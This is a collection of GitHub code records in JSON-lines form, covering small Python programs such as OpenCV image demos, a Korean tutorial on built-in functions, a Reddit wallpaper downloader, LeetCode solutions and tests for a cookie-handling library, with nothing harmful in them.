https://docs.python.org/zh-cn/3.7/library/argparse.html#module-argparse\n# u:python argparse_1.py -o hhh\n## 文件名不能和包名argparse相同argparse.py\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-o', '--output')\n parser.add_argument('-v', dest='verbose', action='store_true')\n args = parser.parse_args()\n print(args.output)\n # ... do something with args.output ...\n # ... do something with args.verbose ..","repo_name":"kingreatwill/penter","sub_path":"study/cli_argparse_1.py","file_name":"cli_argparse_1.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"41742501966","text":"import sys\n\nclass Generator():\n def __init__(self, factor, start):\n self.factor = factor\n self.value = start\n\n def next(self):\n self.value = self.factor*self.value%2147483647\n return self.value\n\nclass SafeGenerator():\n def __init__(self, base, factor, start):\n self.base = base\n self.factor = factor\n self.value = start\n\n def next(self):\n self.value = self.factor*self.value%2147483647\n while(self.value % self.base != 0):\n self.value = self.factor*self.value%2147483647\n return self.value\n\n\n\ndef run(start_a, start_b, iters):\n count = 0\n gen_a = SafeGenerator(4,16807, start_a)\n gen_b = SafeGenerator(8,48271, start_b)\n for i in range(iters):\n a = gen_a.next()\n b = gen_b.next()\n if(((a ^ b) & 65535) == 0):\n count+=1\n return count\n\nif __name__ == '__main__':\n print(run(512, 191, 5000000))","repo_name":"neilb14/advent-of-code","sub_path":"day15/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3603794872","text":"from flask import Blueprint, jsonify, abort, make_response, request\nfrom flask_cors import CORS\nfrom common.anime import Anime\nimport requests\n\napi = Blueprint('kitsu', __name__, url_prefix='/kitsu')\ncors = CORS(api, origins='https://www.cs.drexel.edu')\n\nsession = requests.Session()\nsession.headers = {\n 'Accept': 'application/vnd.api+json',\n 'Content-Type': 'application/vnd.api+json'\n}\n\n\n@api.route('/', methods=['GET'])\ndef get_recomendation_bytitle(title):\n response = session.get('https://kitsu.io/api/edge/anime?filter[text]=' + title, timeout=4)\n response.raise_for_status()\n\n result = parse(response.json()['data'])\n\n if result:\n return jsonify({'anime': result.toDict()})\n abort(404)\n\n\ndef parse(response):\n anime = response[0]\n\n title_romaji = get_title_by_language_codes(\n anime['attributes']['titles'],\n ['en_jp']\n )\n title_english = get_title_by_language_codes(\n anime['attributes']['titles'],\n ['en', 'en_us']\n )\n title_japanese = get_title_by_language_codes(\n anime['attributes']['titles'],\n ['ja_jp']\n )\n\n rating = anime['attributes']['averageRating']\n\n description = anime['attributes']['synopsis']\n\n return Anime(\n title_english,\n title_romaji,\n title_japanese,\n description,\n rating,\n None,\n None,\n None\n )\n\n\ndef get_title_by_language_codes(titles, codes):\n for language_code in codes:\n if language_code in titles:\n return titles[language_code]\n return None","repo_name":"bug-sam/animewebapi","sub_path":"controllers/kitsuController.py","file_name":"kitsuController.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5820702030","text":"import re\ndef existwhen(data):\n \"\"\"\n Taking the whole data from exit when to not found. and replacing the data between them as empty\n Example :: exit when the varchar has features not found ==> exit when not found --Lakshmi 7/14\n \"\"\"\n data = data\n find_data = re.findall(r'\\bexit when\\b(.*?)\\bnotfound', data, re.DOTALL)\n if len(find_data):\n for i in find_data:\n data = data.replace(i, ' ')\n else:\n data = data\n\n return data\n","repo_name":"sivanagarajumolabant/CookBookApp","sub_path":"backend/Modules/existwhen.py","file_name":"existwhen.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73309099442","text":"import numpy as np\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv.imread('chess.png')\r\nrows,cols,ch = img.shape\r\n\r\n#Affine Transformation\r\npts1 = np.float32([[50,50],[200,50],[50,200]])\r\npts2 = np.float32([[10,100],[200,50],[100,250]])\r\nM = cv.getAffineTransform(pts1,pts2)\r\ndst = cv.warpAffine(img,M,(cols,rows))\r\nplt.subplot(121),plt.imshow(img),plt.title('Original')\r\nplt.subplot(122),plt.imshow(dst),plt.title('Affine')\r\nplt.show()\r\n\r\n#Perspective Transformation\r\npts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])\r\npts2 = np.float32([[0,0],[300,0],[0,300],[300,300]])\r\nM = cv.getPerspectiveTransform(pts1,pts2)\r\ndst = cv.warpPerspective(img,M,(300,300))\r\nplt.subplot(121),plt.imshow(img),plt.title('Original')\r\nplt.subplot(122),plt.imshow(dst),plt.title('Perspective')\r\nplt.show()\r\n","repo_name":"jerald1608/computer_vision","sub_path":"ex7/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7377679258","text":"\r\n# 내장함수\r\n\r\n# abs : 절대값을 돌려주는 함수\r\nabs(3) # 3\r\nabs(-3) # 3\r\n\r\n# all(x) : x가 모두 참이면 True, 거짓이 하나라도 있으면 False\r\nall([1,2,3]) # True\r\nall(([1,2,3,0])) # False\r\n\r\n# any(x) : x중 하나라도 참이면 True, 모두 거짓이면 False\r\nany([1,2,3,0]) # True\r\nany([0,\"\"]) # False\r\n\r\n# chr : 아스키코드 문자를 출력\r\nchr(97) # 'a'\r\nchr(48) # '0'\r\n\r\n# dir : 내장 변수나 함수를 보여준다\r\ndir([1,2,3])\r\ndir()\r\n\r\n# divmod(a,b) : a / b 로 나눈 몫과 나머지를 튜플형으로 반환\r\ndivmod(7,3) # (2,1) 몫은 2, 나머지는 3\r\n\r\n# enumerate : 열거형, 순서가 있는 자료형을 입력받아 인덱스값을 포함하는 enumerate객체를 돌려준다\r\nfor i, name, in enumerate(['body', 'foo', 'bar']):\r\n print(i, name)\r\n'''\r\n0 body\r\n1 foo\r\n2 bar\r\n'''\r\n\r\n# eval(expressioin) : 실행 가능한 문자열을 입력받아 실행결과 값 반환\r\neval('1+2') # 3\r\neval(\"'hi' + 'a'\") # 'hia'\r\neval('divmod(4,3)') # (1, 1)\r\n\r\n# filter\r\ndef positive(l):\r\n result = []\r\n for i in l:\r\n if i > 0:\r\n result.append(i)\r\n return result\r\nprint(positive([1,-3,2,0,-5,6])) # [1, 2, 6]\r\n\r\n# 위으 ㅣ코드를 더 간단하게 : lambda\r\nlist(filter(lambda x: x>0,[1,-3,2,0,-5,6])) # [1, 2, 6]\r\n\r\n# hex(x) : 16진수로 반환\r\nhex(234) # '0xea'\r\n\r\n# id : 객체의 고유주소 값 반환\r\na = 3\r\nid(3) # 8791332659664\r\nid(a) # 8791332659664\r\n\r\n# input() : 콘솔 입력값 받기\r\n\r\n# int() : 정수로 캐스팅\r\n# int('값',진수) : 진수 ==> 10진수로\r\nint('11',2) # 3\r\nint('1A',16) # 26\r\n\r\n# isinstance(객체,클래스) : 인스턴스가 해당 클래스의 인스턴스인지 판단, 참일경우 True\r\nclass Person:\r\n pass # 내용이 없는 클래스입니다\r\n\r\na = Person() # 인스턴스 생성\r\nb = 3\r\nisinstance(a,Person) # a가 Person클래스의 인스턴스인지 확인 : True\r\nisinstance(b,Person) # False\r\n\r\n# len(s) : s의 길이의 갯수 반환\r\nlen(\"python\") # 6\r\nlen([1,2,3]) # 3\r\n\r\n# list(s) : s를 입력받아 리스트로 만들어 반환\r\nlist(\"pyrhon\") # ['p', 'y', 'r', 'h', 'o', 'n']\r\n\r\n# map(함수, 반복자료) : 자료의 갯수만큼 함수 실행 후 그 결과를 묶어서 반환\r\n# 본래 코드\r\ndef two_times(numberList):\r\n result = []\r\n for number in numberList:\r\n result.append(number*2)\r\n return result\r\n\r\nresult = two_times([1,2,3,4])\r\nprint(result) # [2, 4, 6, 8]\r\n# map함수 이용\r\ndef two_times(x): return x*2\r\nlist(map(two_times, [1,2,3,4])) # [2, 4, 6, 8]\r\n# map과 lambda함수 이용\r\nlist(map(lambda a: a*2, [1,2,3,4])) # [2, 4, 6, 8]\r\n\r\n# max() : 최댓값\r\nmax([1,2,3]) # 3\r\n\r\n# min() : 최솟값\r\nmin([1,2,3]) # 1\r\n\r\n# oct() : 8진수 반환\r\noct(34) # '0o42'\r\noct(12345) # '0o30071'\r\n\r\n# open(파일이름, [읽기방법]) : 파일객체 반환 / 읽기방법 생략 시 기본값 r\r\n\r\n# ord(c) : 문자의 아스키코드 값 반환\r\nord('a') # 97\r\nord('0') # 48\r\n\r\n# pow(x,y) : x의 y제곱 결과 값 반환\r\npow(2,4) # 16\r\n\r\n# range([start],stop,[step]) :\r\nlist(range(5)) # [0, 1, 2, 3, 4]\r\nlist(range(5,10)) # [5, 6, 7, 8, 9]\r\nlist(range(1,10,2)) # [1, 3, 5, 7, 9]\r\n\r\n# round(숫자,[소수점자리]) : 반올림\r\nround(4.6) # 5\r\nround(5.678,2) # 5.68\r\n\r\n# sorted() : 입력값을 정렬 후 리스트 형태로 반환\r\nsorted([3,1,2]) # [1, 2, 3]\r\nsorted(['a','c','b']) # ['a', 'b', 'c']\r\nsorted(\"zero\") # ['e', 'o', 'r', 'z']\r\nsorted((3,2,1)) # [1, 2, 3]\r\n\r\n# str() : 문자열로 반환\r\nstr(3) # '3'\r\nstr('hi'.upper()) # 'HI'\r\n\r\n# sum() : 입력받은 리스트나, 튜플의 모든 요소의 합 반환\r\nsum([1,2,3]) # 6\r\nsum((4,5,6)) # 15\r\n\r\n# tuple() : 튜플형태로 반환\r\ntuple(\"abc\") # ('a', 'b', 'c')\r\ntuple([1,2,3]) # (1, 2, 3)\r\n\r\n# type() : 입력값의 자료형 반환\r\ntype(\"abc\") # \r\ntype([]) # \r\n\r\n# zip() : 동일한 개수로 이루어진 자료형을 묶어주는 역할\r\nlist(zip([1,2,3], [4,5,6])) # [(1, 4), (2, 5), (3, 6)]\r\nlist(zip([1,2,3], [4,5,6], [7,8,9])) # [(1, 4, 7), (2, 5, 8), (3, 6, 9)]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"heeji1996/Python","sub_path":"내장함수.py","file_name":"내장함수.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4730334668","text":"#Multilevel - class C inherits class B, class B inherits class A --> One child inherits another child, and another child inherits parent\n#we can create any number of levels\n\nclass A:\n a,b = 10,20\n def add(self):\n print(self.a+self.b)\n\nclass B(A):\n x,y = 100,200\n def mul(self):\n print(self.x*self.y)\n\nclass C(B):\n i,j=10,2\n def div(self):\n print(self.i/self.j)\n\nc = C()\nc.add()\nc.mul()\nc.div()","repo_name":"shreyassk18/MyPyCharmProject","sub_path":"OOPs_concept/Inheritance/Multilevel_inheritance.py","file_name":"Multilevel_inheritance.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17092025152","text":"from typing import List\n\nclass Solution:\n def filterRestaurants(self, restaurants: List[List[int]], veganFriendly: int, maxPrice: int, maxDistance: int) -> List[int]:\n r1 = [[x[0],x[1]] for x in restaurants if (veganFriendly & x[2] == veganFriendly) and x[3] <= maxPrice and x[4] <= maxDistance ]\n r2 = sorted(r1,key=lambda x:(x[1],x[0]),reverse=True)\n r3 = map(lambda x:x[0],r2)\n return list(r3)\n\ns = Solution()\n\nrestaurants = [[1,4,1,40,10],[2,8,0,50,5],[3,8,1,30,4],[4,10,0,10,3],[5,1,1,15,1]]\nveganFriendly = 1\nmaxPrice = 50\nmaxDistance = 10\n\nprint(s.filterRestaurants(restaurants,veganFriendly,maxPrice,maxDistance))","repo_name":"zhroot/leetcode","sub_path":"1333.py","file_name":"1333.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29980893989","text":"# NOTE: Much of the following code has been taken from the website\r\n# https://www.datacamp.com/community/tutorials/understanding-logistic-regression-python\r\n\r\nimport os.path\r\nimport pandas\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn import metrics\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\nimport seaborn\r\n\r\nif not os.path.exists(\"Surgical-deepnet.csv\"):\r\n print(\"Please place Surgical-deepnet.csv in the same directory as this program and then re-run the file.\")\r\nelse:\r\n # load data from CSV file\r\n print(\"Loading data from CSV file...\")\r\n ColNames = ['bmi', 'Age', 'asa_status', 'baseline_cancer', 'baseline_charlson', 'baseline_cvd',\r\n 'baseline_dementia', 'baseline_diabetes', 'baseline_digestive', 'baseline_osteoart', 'baseline_psych',\r\n 'baseline_pulmonary', 'ahrq_ccs', 'ccsComplicationRate', 'ccsMort30Rate', 'complication_rsi', 'dow',\r\n 'gender', 'hour', 'month', 'moonphase', 'mort30', 'mortality_rsi', 'race', 'complication',\r\n 'complication_or_mort30']\r\n File = pandas.read_csv(\"Surgical-deepnet.csv\", header=None, names=ColNames)\r\n File.head()\r\n\r\n print(\"Choose your inputs\\n(1) Raw inputs\\n(2) All inputs\")\r\n while True:\r\n ChooseInput = input(\"Enter: \")\r\n try:\r\n ChooseInput = int(ChooseInput)\r\n if ChooseInput == 1:\r\n FeatureCols = ['bmi', 'Age', 'baseline_cancer', 'baseline_cvd', 'baseline_dementia',\r\n 'baseline_diabetes', 'baseline_digestive', 'baseline_osteoart', 'baseline_psych',\r\n 'baseline_pulmonary', 'gender', 'race', 'dow', 'hour', 'month', 'moonphase']\r\n break\r\n elif ChooseInput == 2:\r\n FeatureCols = ['bmi', 'Age', 'baseline_cancer', 'baseline_charlson', 'baseline_cvd',\r\n 'baseline_dementia', 'baseline_diabetes', 'baseline_digestive', 'baseline_osteoart',\r\n 'baseline_psych',\r\n 'baseline_pulmonary', 'ahrq_ccs', 'ccsComplicationRate', 'ccsMort30Rate',\r\n 'complication_rsi', 'dow',\r\n 'gender', 'hour', 'month', 'moonphase', 'mortality_rsi', 'race']\r\n break\r\n else:\r\n print(\"Invalid input.\")\r\n except ValueError:\r\n print(\"Invalid input.\")\r\n\r\n Features = File[FeatureCols] # actual feature data\r\n TargetVariable = File.complication_or_mort30 # label (target variable)\r\n print(\"Done.\\n\")\r\n\r\n print(\"Training logistic model...\")\r\n # splits data into training (90%) and testing (10%)\r\n TrainFeatures, TestFeatures, TrainLabels, TestLabels = train_test_split(Features, TargetVariable, test_size=0.1, random_state=1)\r\n Batches = 50 # splits data into equal pieces\r\n Epochs = 20 # runs data through the model 20 times\r\n ListTrainFeatures = numpy.array_split(TrainFeatures, Batches) # splits the data into 100 batches\r\n ListTrainLabels = numpy.array_split(TrainLabels, Batches)\r\n LogReg = LogisticRegression(max_iter=700, warm_start=True, random_state=1)\r\n print(\"0 %\")\r\n for a in range(Epochs):\r\n for b in range(Batches):\r\n LogReg.fit(ListTrainFeatures[b], ListTrainLabels[b]) # trains model\r\n print(round(((a + 1) / Epochs * 100), 1), \"%\")\r\n print(\"Done.\")\r\n\r\n # displays training\r\n LabelPrediction = LogReg.predict(TestFeatures)\r\n print(\"Accuracy:\", metrics.accuracy_score(TestLabels, LabelPrediction))\r\n print(\"Precision:\", metrics.precision_score(TestLabels, LabelPrediction))\r\n print(\"Recall:\", metrics.recall_score(TestLabels, LabelPrediction))\r\n\r\n ConfusionMatrix = metrics.confusion_matrix(TestLabels, LabelPrediction)\r\n Classes = [\"No complication\", \"Complication\"] # have complication or not\r\n fig, ax = plt.subplots()\r\n tick_marks = numpy.arange(len(Classes))\r\n plt.xticks(tick_marks, Classes)\r\n plt.yticks(tick_marks, Classes)\r\n\r\n # create confusion matrix heatmap\r\n seaborn.heatmap(pandas.DataFrame(ConfusionMatrix), annot=True, cmap=\"YlGnBu\", fmt='g')\r\n ax.xaxis.set_label_position(\"top\")\r\n plt.tight_layout()\r\n plt.title('Confusion matrix', y=1.1)\r\n plt.ylabel('Actual outcome')\r\n plt.xlabel('Predicted outcome')\r\n plt.show()\r\n\r\n # evaluate performance\r\n y_pred_proba = LogReg.predict_proba(TestFeatures)[::, 1]\r\n fpr, tpr, _ = metrics.roc_curve(TestLabels, y_pred_proba)\r\n auc = metrics.roc_auc_score(TestLabels, y_pred_proba)\r\n plt.plot(fpr, tpr, label=\"Data, AUC Score=\" + str(auc))\r\n plt.legend(loc=4)\r\n plt.show()\r\n","repo_name":"MonsieurLundi/Logistic-Regression","sub_path":"Machine Learning Complication Predictor.py","file_name":"Machine Learning Complication Predictor.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21272785569","text":"\r\nfrom sorting.algorithms.algorithm import Algorithm\r\nfrom sorting.sorting import Sorting\r\n\r\n\r\nclass Student:\r\n '''\r\n Represents an entity student:\r\n -studentID - unique ID\r\n -name - name of the student\r\n '''\r\n \r\n def __init__(self, studentID, studentName):\r\n self.__studentID = studentID\r\n self.__studentName = studentName\r\n \r\n\r\n def student_less_than(self, other):\r\n \"\"\"name ascending, age descending\r\n \"\"\"\r\n if self.studentName == other.studentName:\r\n return self.studentID > other.studentID\r\n return self.studentName < other.studentName\r\n \r\n \r\n def __lt__(self, other):\r\n return self.student_less_than(other)\r\n def __gt__(self):\r\n return lambda x, y: not self.student_less_than(x, y)\r\n \r\n def __str__(self):\r\n '''\r\n This function represents the student\r\n ''' \r\n \r\n return 'StudentID: {0} StudentName: {1}'.format(self.__studentID, self.__studentName)\r\n \r\n @property\r\n def studentID(self):\r\n '''\r\n Getter for the id of the student\r\n :return: an integer representing the id of the student\r\n '''\r\n return self.__studentID\r\n \r\n @studentID.setter\r\n def studentID(self,newID):\r\n '''\r\n Setter for the student Id\r\n :parameter: the new Id \r\n '''\r\n self.__studentID = newID\r\n \r\n @studentID.deleter\r\n def studentID(self):\r\n del self.__studentID\r\n \r\n @property\r\n def studentName(self):\r\n '''\r\n Getter for the Name of the student\r\n :return: a string: the name of the student\r\n '''\r\n return self.__studentName \r\n \r\n @studentName.setter \r\n def studentName(self,newName):\r\n '''\r\n Setter for the student name\r\n :parameter: the new name\r\n '''\r\n self.__studentName = newName\r\n \r\n @studentName.deleter\r\n def studentName(self):\r\n del self.__studentName\r\n\r\n\r\nif __name__ == '__main__':\r\n l = [2, 1, 3]\r\n Sorting.sort(l)\r\n assert (l == [1, 2, 3])\r\n\r\n l = [2, 1, 4,3,-1]\r\n Sorting.sort(l)\r\n assert (l == [-1,1,2,3,4])\r\n \r\n l=[-3,4,0,-1]\r\n Sorting.sort(l)\r\n assert(l==[-3,-1,0,4])\r\n \r\n \r\n st1=Student(3,\"Mary\")\r\n st2=Student(1,\"Anne\")\r\n st3=Student(2,\"Eric\")\r\n st4=Student(4,\"Christian\")\r\n \r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x: x.studentID)\r\n assert(l==[st2,st3,st1,st4])\r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x: x.studentID,reverse=True)\r\n assert(l==[st4,st1,st3,st2])\r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x: x.studentName)\r\n assert(l==[st2,st4,st3,st1])\r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x:x.studentName, reverse=True)\r\n assert(l==[st1,st3,st4,st2]) \r\n \r\n\r\n st1=Student(3,\"st1\")\r\n st2=Student(1,\"st3\")\r\n st3=Student(3,\"st4\")\r\n st4=Student(4,\"st3\")\r\n st5=Student(0,\"st3\")\r\n \r\n # sort by name,id ascending\r\n l = [st3, st2, st1, st4,st5]\r\n Sorting.sort(l, key=lambda x: (x.studentName, x.studentID))\r\n assert (l == [st1, st5,st2, st4, st3]) \r\n\r\n # sort by name ascending and by ID descending \r\n l = [st3, st2, st1, st4,st5]\r\n Sorting.sort(l)\r\n assert (l == [st1,st4,st2,st5,st3]) \r\n \r\n print(\"Sorting works!\") \r\n\r\n# #sort by name ascending and by ID descending with BubbleSort2\r\n# l = [st3, st2, st1, st4,st5]\r\n# Sorting.sort(l,algorithm=Algorithm.BUBBLE_SORT2)\r\n# assert (l == [st1,st4,st2,st5,st3]) \r\n# \r\n# \r\n# # sort by name ascending and by age descending with InsertionSort\r\n# l = [p3, p2, p1, p4]\r\n# Sorting.sort(l, algorithm=Algorithm.INSERTION_SORT)\r\n# assert (l == [p4, p1, p2, p3])\r\n \r\n# # sort by name ascending and by age descending with InsertionSort\r\n# l = [st3, st2, st1, st4,st5]\r\n# Sorting.sort(l,algorithm=Algorithm.INSERTION_SORT_REC)\r\n# assert (l == [st1,st4,st2,st5,st3])\r\n# \r\n# # sort by name ascending and by age descending with QuickSort\r\n# l = [st3, st2, st1, st4,st5]\r\n# Sorting.sort(l,algorithm=Algorithm.QUICK_SORT)\r\n# assert (l == [st1,st4,st2,st5,st3]) \r\n# \r\n# # sort by name ascending and by age descending with MergeSort\r\n# l = [p3, p2, p1, p4]\r\n# Sorting.sort(l, algorithm=Algorithm.MERGE_SORT)\r\n# assert (l == [p4, p1, p2, p3])\r\n# \r\n# print(\"hello world\")\r\n","repo_name":"IuliaRobas/StudentsRegisterManagement","sub_path":"src/sorting/algorithms/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72136185521","text":"from __future__ import print_function\nimport shutil\nimport urllib.request\nimport requests\nimport os\n\nsubreddits = [\n 'r/Wallpaper',\n 'r/Wallpapers',\n 'r/MinimalWallpaper', \n \n 'r/PixelArt',\n 'r/DigitalArt',\n 'r/ImaginaryLandscapes',\n 'r/Illustration'\n]\n\ndef getImage(i):\n curr_dir = os.getcwd()\n curr_dir = os.path.join(curr_dir,\"wallpapers\")\n file_name = i[2:] + '.png'\n if os.path.isfile(os.path.join(curr_dir,file_name)) == True:\n return \"-1\"\n url = f\"http://www.reddit.com/{i}/top.json?t=day\"\n query_params = {\n \"limit\":5\n }\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n r = requests.get(f\"{url}\",params=query_params , headers=headers)\n print(\"req code : \" + str(r.status_code))\n print(i)\n if r.status_code != 200:\n return \"-1\"\n else:\n res = r.json()\n print(len(res['data']['children']))\n for post in res['data']['children']:\n if 'preview' in post['data']: \n resolution_width = post['data']['preview']['images'][0]['resolutions'][-1]['width']\n url = post['data']['url']\n if post['data']['over_18'] == False and resolution_width == 1080 and (url.endswith('.png') or url.endswith('.jpg') or url.endswith('.gif')):\n print('url sent...')\n return url\n else:\n print(\"sry...\")\n\ndef downloadImage(i):\n url = \"\"\n url = getImage(i)\n \n if url != \"-1\" and url is not None:\n file_name = i[2:]+'.png'\n print(url)\n curr_dir = os.getcwd()\n curr_dir = os.path.join(curr_dir,\"wallpapers\",file_name)\n urllib.request.urlretrieve(url,curr_dir)\n print(f\"{file_name} downloaded...\")\n\ndef deletePrevImages():\n curr_dir = os.getcwd()\n folder_name = \"wallpapers\"\n curr_path = os.path.join(curr_dir,folder_name)\n # print(curr_dir)\n print(curr_path)\n if os.path.isdir(curr_path):\n # os.removedirs(curr_path)\n shutil.rmtree(curr_path,ignore_errors=True)\n\n os.mkdir(curr_path)\n\ndeletePrevImages()\nfor i in range(50):\n for subreddit in subreddits:\n downloadImage(subreddit)\n\nprint(\"Done...\")","repo_name":"Hell3ringer/Reddit_Top_Wallpapers","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30533360735","text":"# needed for python unit testings\n# https://docs.python.org/3/library/unittest.html\nimport unittest\n\n# required for type hinting\n# https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html\nfrom typing import List\n\nfrom collections import deque\n\nclass Solution:\n '''\n Given a string s and an integer k, a k duplicate removal consists of\n choosing k adjacent and equal letters from s and removing them,\n causing the left and right side of the deleted substring to\n concatenate together.\n\n Repeatedly make k duplicate removals on s until it is no longer\n possible to make a k duplicate removal.\n\n Return the final string after all such duplicate removals have been\n made. It is guaranteed that the answer is unique.\n '''\n def removeDuplicates(self, s: str, k: int) -> str:\n # works because s only contains lowercase english letters, would\n # have to change ' ' to a character that could not appear in\n # input string.\n d = deque([' '])\n for i in s:\n if i == d[-1][0]:\n d[-1] += i\n else:\n d.append(i)\n if len(d[-1]) >= k:\n d.pop()\n return ''.join(d)[1:]\n\nclass UnitTesting(unittest.TestCase):\n def test_one(self):\n s = Solution()\n i = \"abcd\"\n j = 2\n o = \"abcd\"\n self.assertEqual(s.removeDuplicates(i,j), o)\n\n def test_two(self):\n s = Solution()\n i = \"deeedbbcccbdaa\"\n j = 3\n o = \"aa\"\n self.assertEqual(s.removeDuplicates(i,j), o)\n\n def test_three(self):\n s = Solution()\n i = \"pbbcggttciiippooaais\"\n j = 2\n o = \"ps\"\n self.assertEqual(s.removeDuplicates(i,j), o)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)","repo_name":"olsenw/LeetCodeExercises","sub_path":"Python3/remove_all_adjacent_duplicates_in_string_ii.py","file_name":"remove_all_adjacent_duplicates_in_string_ii.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39672899278","text":"\nimport cv2\nimport numpy as np\noriginal_img = cv2.imread('/home/gzb/PycharmProjects/homework/data/4.1.jpeg')\nres = cv2.resize(original_img,None,fx=0.6, fy=0.6,\n interpolation = cv2.INTER_CUBIC) #图形太大了缩小一点\nB, G, R = cv2.split(res) #获取红色通道\nimg = R\n_,RedThresh = cv2.threshold(img,160,255,cv2.THRESH_BINARY)\n#OpenCV定义的结构矩形元素\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(3, 3))\neroded = cv2.erode(RedThresh,kernel) #腐蚀图像\ndilated = cv2.dilate(RedThresh,kernel) #膨胀图像\n\ncv2.imshow(\"original_img\", res) #原图像\ncv2.imshow(\"Eroded Image\",eroded) #显示腐蚀后的图像\ncv2.imshow(\"Dilated Image\",dilated) #显示膨胀后的图像\n\n# #NumPy定义的结构元素\nNpKernel = np.uint8(np.ones((3,3)))\nNperoded = cv2.erode(RedThresh,NpKernel) #腐蚀图像\n# cv2.imshow(\"Eroded by NumPy kernel\",Nperoded) #显示腐蚀后的图像\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"gzb126/Some-simple-handling-of-images","sub_path":"demo/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9765320722","text":"import json\nfrom flask import render_template, Blueprint\nfrom project.stats.process_classifications import get_data\n\n# define blueprints\nstats_blueprint = Blueprint(\n 'stats', __name__,\n template_folder='templates'\n)\n\n@stats_blueprint.route('/stats')\ndef index():\n #Justin, you can access the json through the variable json_data\n json_data = json.dumps(get_data())\n\n return render_template('stats.html', json_data=json_data)\n","repo_name":"LearnTeachCode/marsrocks","sub_path":"project/stats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"34728044590","text":"import json\nimport pickle\nfrom pprint import pprint # pylint: disable=unused-import\n\nfrom grab.cookie import CookieManager, create_cookie\nfrom grab.error import GrabMisuseError\nfrom test_server import Response\nfrom tests.util import BaseGrabTestCase, build_grab, temp_file\n\n\nclass TestCookies(BaseGrabTestCase):\n def setUp(self):\n self.server.reset()\n\n def test_parsing_response_cookies(self):\n grab = build_grab()\n self.server.add_response(\n Response(headers=[(\"Set-Cookie\", \"foo=bar\"), (\"Set-Cookie\", \"1=2\")])\n )\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n\n def test_multiple_cookies(self):\n grab = build_grab()\n self.server.add_response(Response())\n grab.setup(cookies={\"foo\": \"1\", \"bar\": \"2\"})\n grab.go(self.server.get_url())\n self.assertEqual(\n set((x.key, x.value) for x in self.server.request.cookies.values()),\n set([(\"foo\", \"1\"), (\"bar\", \"2\")]),\n )\n\n def test_session(self):\n # Test that if Grab gets some cookies from the server\n # then it sends it back\n grab = build_grab()\n grab.setup(reuse_cookies=True)\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertEqual(\n set([(\"foo\", \"bar\")]),\n set((x.key, x.value) for x in self.server.request.cookies.values()),\n )\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertEqual(\n set([(\"foo\", \"bar\")]),\n set((x.key, x.value) for x in self.server.request.cookies.values()),\n )\n\n # Test reuse_cookies=False\n grab = build_grab()\n grab.setup(reuse_cookies=False)\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertTrue(len(self.server.request.cookies) == 0)\n\n # Test something\n grab = build_grab()\n 